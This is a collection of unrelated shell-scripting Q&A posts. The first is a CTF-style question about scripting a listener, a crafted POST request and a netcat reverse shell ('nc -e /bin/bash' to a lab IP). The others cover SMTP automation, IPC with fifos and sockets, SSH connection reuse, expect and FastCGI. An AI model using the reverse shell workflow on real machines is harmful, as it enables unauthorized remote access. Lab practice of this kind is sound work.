I'm doing an exercise (basically just a CTF), where we do some exploits of some vulnerable machines. For example, by sending a specially crafted post request, we can make it execute for example
nc -e /bin/bash 10.0.0.2 2546
What I want to do, is to script my way out of this, to make it easier.
Setup a listener for a specific port
Send a post request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges.
Present user with the shell (e.g. which is sent through nc)
This is not a post on how to either hack it or escalate privileges, but my scripting capabilities (especially in bash!) is not the best.
The problem is when I reach step 2. For obvious reason, I can't start nc -lvp 1234 before sending the post request, since it blocks. And I'm faily sure multithreading in bash is not possible (...somebody have probably made it though.)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed with a connection back home, how would I manage to send data from my script, though netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and use that as a "buffer"?
I know there is a lot of questions, and it can't be answered with one answer, but I'd like to hear more about how people would do that. OR if it's completely ridiculous to do in bash.
Related
Once in a while, I need to ETRN a couple of backup servers (e.g. after maintenance of my own SMTP server).
Normally, I use telnet for that. I go to that server, HELO with my own name and give the ETRN commands. I would like to automate that in a decent way. A simple (but not decent) way would be to start telnet with <<, but the problem is that I do not want to send commands out of order (and the other end may even drop the connection if I do that, haven't tested it yet, but if it works now, it may not work anymore later so I'd like a decent solution and not one that may break later). E.g., I want to wait for the 220 line from the remote SMTP server, then send my HELO, wait for the 250 reply, and only then send the various ETRN commands.
How do I do that in bash? Or do I need to use something else, such as python?
Okay, so I have two shell scripts, a server and a client, where the server is always run as root, and the clients can be run as standard users in order to communicate with the server.
The method I've chosen to do this is with a world-accessible directory containing named pipes (fifos), one of which is world-writable (to enable initial connection requests) and the others are created per-user and writable only by them (allowing my server script to know who sent a message).
This seems to work fine but it feels like it may be over-engineered or missing a more suitable alternative. It also lacks any means of determining whether the server is currently running, besides searching for its name in the output of ps. This is somewhat problematic as it means that writing to the connection fifo will hang if the server script isn't available to read from it.
Are there better ways to do something like this for a shell script? Of course I know could use an actual program to get access to more capabilities, but this is really just intended to provide secure access to a root service for non-root users (i.e - it's a wrapper for something else).
You could use Unix domain sockets instead of fifos. Domain sockets can be created with nc -lU /path/to/wherever and connected to with nc -U /path/to/wherever. This creates a persistent object in the filesystem (like a fifo, but different). The server should be able to maintain multiple simultaneous connections over the same socket.
If you're willing to write in C (or some other "real" programming language), it's also possible to pass credentials over Unix domain sockets, unlike fifos. This makes it possible for the server to authenticate its clients without needing to rely on filesystem permissions or other indirect means. Unfortunately, I'm not aware of any widely-supported interface for doing this in a shell script.
Okay, so I have a shell script for transferring some files to a remote host using rsync over ssh.
However, in addition to the transfer I need to do some house-keeping beforehand and afterwards, which involves an additional ssh with command, and a call to scp to transfer some extra data not included in the rsync transfer (I generate this data while the transfer is taking place).
As you can imagine this currently results in a lot of ssh sessions starting and stopping, especially since the housekeeping operations are actually very quick (usually). I've verified on the host that this is show up as lots of SSH connects and disconnects which, although minor compared to the actual transfer, seems pretty wasteful.
So what I'm wonder is; is there a way that I can just open an ssh connection and then leave it connected until I'm done with it? i.e - my initial ssh housekeeping operation would leave its connection open so that when rsync (and afterwards scp) runs it can just do its thing using that previously opened connection.
Is such a thing even possible in a shell script? If so, any pointers about how to handle errors (i.e - ensure the connection is closed once it isn't needed) would be appreciated as well!
It's possible. The easiest way doesn't even require any programming. See https://unix.stackexchange.com/questions/48632/cant-share-an-ssh-connection-with-rsync - the general idea is to use SSH connection reuse to get your multiple SSHs to share one session, then get rsync to join in as well.
The hard way is to use libssh2 and program everything yourself. This will be a lot more work, and it seems in your case has nothing to recommend it. For more complex scenarios, it's useful.
I'm making a bash script to send commands to a launched program, the only way I founded on internet was through named pipes.
Is there an easier way to do it all inside the same script? Because named pipes have the problem that I must have 3 scripts, one for managing the program, other sending the information from the main and then the reader to parse the information to the program (If I correctly understood the above link).
And that is a problem as the manager has to call the others because I need the reader to recieve an array of files as input and I found no way of doing so, if you know how please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl post I tried
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work, it just spawns vlc but it doesn't skip the song
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter process communication. Files/pipes/signals/sockets could be used. Write to a specific file in the script and then send an interrupt the program so it knows to check the file, for example.
Depending on your language of choice, and how much time you can spend on this/how big this project will be. You could have the launched program use a thread to listen on a port for TCP packets and react to them. Then in your bash script you could netcat the information, or send an HTTP POST with curl.
Are you sure it's not possible for the application to be started by the script? Allowing the script to just pass arguments or define some environment variables.
I would like to use FastCGI with shell scripts.
I have found several tutorials about writing CGI scripts in shell, but nothing about FastCGI, and I guess this is not the same thing.
Is it possible, and how?
Thank you
Edit: Ignacio: Thank you but this link is 14 years old and says that this is not currently supported. Is it still unsupported?
The whole point of FastCGI is to avoid spawning a new process for each incoming connection. By the very nature of the language, a shell script will spawn many processes during its execution, unless you want to restrict yourself greatly. (No cat, awk, sed, grep, etc, etc). So from the start, if you're going to use shellscript, you may as well use regular CGI instead of FastCGI.
If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, there is no UNIX tool that does this. Now, you could write one in some other language, and it could run your shellscript once for each incoming connection. But this is exactly what normal CGI does, and I guarantee it does it better than the custom program you or I would write. So again, stick with normal CGI if you want to use shellscript.
"If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, (...)" there is one C program doing nearly this: exec_with_piped.c
(it's using pipes, not sockets, but the C code should be easily adapted for your purpose)
Look at "Writing agents in sh: conversing through a pipe"
http://okmij.org/ftp/Communications.html
Kalou
No
I apologize in advance if this is a dumb question but is it
conceivable to use a mere shell script (sh or ksh) as a
FastCGI program and if so, how?
You can not use a simple shell script as a FastCGI program. Since
shell script can not persist across multiple HTTP requests, it can not be
used as a FastCGI application. For the program to handle multiple HTTP
requests in its own lifetime (i.e. not just handle requests and die, like
CGI applications), it needs some means to communicate with the web server
to recieve a request, and send the reply back to the server after handling
it. This communication is accomplished via FCGI library, which implements
the above and it currently supports only a subset of programming languages,
like C, Perl, Tcl, Java... In short, it does NOT support shell.
Hope that cleared it up a bit.
Stanley.
From http://www.fastcgi.com/:
FastCGI is simple because it is actually CGI with only a few extensions.
Also:
Like CGI, FastCGI is also language-independent.
So you can use FastCGI with shell scripts or any other kind of scripts, just like CGI.
Tutorials for CGI are useful to learn FastCGI too, except maybe for the particularities of setting up the web server.